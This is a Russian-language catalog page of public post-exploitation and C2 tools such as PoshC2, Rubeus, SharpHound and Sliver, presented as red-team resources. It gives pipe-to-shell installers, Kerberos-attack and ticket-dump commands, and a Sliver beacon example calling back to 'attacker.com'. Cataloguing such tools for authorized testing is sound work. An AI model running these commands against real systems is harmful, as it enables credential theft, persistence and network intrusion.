Каталог инструментов

62 инструментов

Тег: post-exploitation ×

PoshC2

v9.0
Exploitation

Proxy-aware C2 фреймворк для авторизованного red team: постэксплуатация и латеральное перемещение. Модульная архитектура на PowerShell/C#/Python с готовыми имплантами.

curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash sudo ./Install.sh curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | sudo bash -s -- -p /root/PoshC2 curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/dev/Install.sh | sudo bash -s -- -b dev curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install-for-Docker.sh | sudo bash curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/BRANCHNAME/Install-for-Docker.sh | sudo bash -s -- -b BRANCHNAME

Project Onyx

Post-Exploitation

Демонстрационный red-team пайплайн, показывающий продвинутый обход EDR через спуфинг телеметрии на базе AI и WASM-песочницу.

git clone --recursive https://github.com/microsoft/onnxruntime.git onnxruntime .\onnxruntime\build.bat --config Release --parallel --compile_no_warning_as_error --skip_tests --build_shared_lib --use_vcpkg --cmake_extra_defines VCPKG_TARGET_TRIPLET=x64-windows-static-md onnxruntime_BUILD_UNIT_TESTS=OFF python build.py fingerprint --show-components cargo build --manifest-path wasm_license_module/Cargo.toml --target wasm32-unknown-unknown --release python build.py build --trigger "<64-char lowercase fingerprint hash>" --secret "<exactly-32-demo-key-chars>" --model-output assets/model.onnx --wasm-input wasm_license_module/target/wasm32-unknown-unknown/release/wasm_license_module.wasm --wasm-output assets/license_module.wasm.aes python build.py verify --trigger "<64-char lowercase fingerprint hash>" --model assets/model.onnx python build.py fetch-model python build.py downlink-build --trigger "<64-char lowercase fingerprint hash>" --reference-model assets/model.onnx --output assets/downlink_update.onnx --command set_status --status lab_C2_test --expires-unix 4102444800 --cover-seed 2026 --cover-fraction 0.08 --cover-noise-scale 0.00004 python build.py downlink-verify --trigger "<64-char lowercase fingerprint hash>" --reference-model assets/model.onnx --model assets/downlink_update.onnx cmake -S . -B build -G "Visual Studio 17 2022" -A x64 cmake --build build --config Release
Post-Exploitation

ИИ-платформа для симуляции Red Team, автономно моделирующая полный жизненный цикл атаки с маппингом MITRE ATT&CK.

git clone https://github.com/apocalypse9949/Redteam-Automation.git cd Redteam-Automation pip install -e .

Rubeus

v1.6.4
Post-Exploitation

C#-инструмент для атак на Kerberos в среде Active Directory: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver Ticket, S4U delegation, PKINIT. Часть арсенала GhostPack.

# Сборка из исходников (Visual Studio / .NET): git clone https://github.com/GhostPack/Rubeus # Открыть Rubeus.sln, собрать Release x64 # Часто загружается через C2 в память: # execute-assembly Rubeus.exe kerberoast /outfile:hashes.txt # Команды: Rubeus.exe kerberoast # Kerberoasting Rubeus.exe asreproast # AS-REP Roasting Rubeus.exe dump # дамп тикетов Rubeus.exe ptt /ticket:... # Pass-the-Ticket

ScareCrow

v5.1
Post-Exploitation

Фреймворк для исследования генерации и подписи полезной нагрузки — изучает, как средства защиты Windows реагируют на разные способы доставки и запуска. Проект архивирован автором, но остаётся справочным материалом …

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo go get github.com/Binject/debug/pe go get github.com/awgh/rawreader go build ScareCrow.go

Seatbelt

Post-Exploitation

C#-проект для сбора информации о хосте Windows ('safety checks'), применяется как в защитных, так и в атакующих сценариях.

git clone https://github.com/GhostPack/Seatbelt.git # Visual Studio: открыть Seatbelt.sln -> Build # или командная строка: dotnet build Seatbelt.csproj -c Release # Готовый EXE доступен в GitHub Releases

SharpDPAPI

v1.12.0
Post-Exploitation

C#-порт части функциональности Mimikatz для работы с Windows DPAPI.

git clone https://github.com/GhostPack/SharpDPAPI.git # Visual Studio: открыть SharpDPAPI.sln -> Build # или командная строка: dotnet build SharpDPAPI.csproj -c Release # Готовый EXE доступен в GitHub Releases
Post-Exploitation

Приложение на C#, использующее права редактирования объекта групповой политики (GPO) для компрометации управляемых им объектов.

git clone https://github.com/ReversecLabs/SharpGPOAbuse.git # Visual Studio: открыть SharpGPOAbuse.sln -> Build (восстановить NuGet-пакеты) # или командная строка: dotnet build SharpGPOAbuse.csproj # Готовый EXE доступен в GitHub Releases

SharpHound

v2.13.0
Post-Exploitation

Коллектор данных для BloodHound: собирает информацию об Active Directory — пользователи, группы, компьютеры, сессии, ACL, GPO, trust relationships. Работает как C#-агент в домене. Вывод в формате JSON/ZIP для …

# Скачать с GitHub Releases: # https://github.com/BloodHoundAD/SharpHound/releases SharpHound.exe -c All SharpHound.exe -c DCOnly # быстрый режим, только DC SharpHound.exe -c All --stealth # скрытный режим # Через PowerShell: Import-Module ./SharpHound.ps1 Invoke-BloodHound -CollectionMethod All

SharpStay

Post-Exploitation

.NET-инструмент для установки механизмов персистентности в Windows.

git clone https://github.com/0xthirteen/SharpStay.git # Visual Studio: открыть SharpStay.sln -> Build # или командная строка: dotnet build SharpStay.csproj # Готовая DLL также входит в состав StayKit (Cobalt Strike aggressor)

SharpUp

Post-Exploitation

C#-порт функциональности PowerUp для поиска векторов повышения привилегий в Windows.

git clone https://github.com/GhostPack/SharpUp.git # Visual Studio: открыть SharpUp.sln -> Build # или командная строка: dotnet build SharpUp.csproj # Готовый EXE доступен в GitHub Releases

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell